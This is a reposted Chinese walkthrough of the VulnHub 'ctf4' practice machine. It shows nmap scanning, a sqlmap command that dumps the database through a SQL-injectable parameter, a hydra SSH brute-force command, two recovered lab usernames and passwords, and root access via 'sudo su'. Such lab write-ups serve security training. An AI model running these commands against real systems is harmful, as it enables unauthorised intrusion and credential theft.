0


vulnhub之ctf4

vulnhub之ctf4
难度:so easy
下载地址
主机发现
netdiscover或者nmap -sP 192.168.2.0/24
在这里插入图片描述
在这里插入图片描述

nmap -p--T4 -A 192.168.2.4

初步进行检测,并且进行端口扫描,发现开放22端口,80端口等
在这里插入图片描述

对80开放的web服务进行检测,这里使用rad加xray配合检测,友情提示,

rad需要谷歌浏览器且不能够在root权限下运行


在这里插入图片描述
检测发现存在sql注入,这里使用sqlmap下载数据库中的数据,别问为什么下载,一个字,快

sqlmap -u 'http://192.168.2.4/index.html?page=blog&title=Blog&id=2' --dbs  --batch --dump 

在user数据表中发现用户名以及密码,编辑为字典,
在这里插入图片描述在这里插入图片描述使用hydra进行爆破

hydra -L uer.txt -P passwd.txt ssh 192.168.2.6-vV  

存在两个用户,

dstevens   password: ilike2surf
achen   password: seventysixers

使用ssh登录时候,可能会产生一定的错误,这里给出解决方法

http://liyangweb.com/service/500.html

使用dstevens登录时,

sudo su

时候,输入该用户对应的密码即可成功变成root用户
在这里插入图片描述使用achen用户名登录时,直接

sudo su

即可到root权限

在这里插入图片描述

标签: 安全

本文转载自: https://blog.csdn.net/qq_54030686/article/details/127516403
版权归原作者 天下是个小趴菜 所有, 如有侵权,请联系我们删除。

“vulnhub之ctf4”的评论:

还没有评论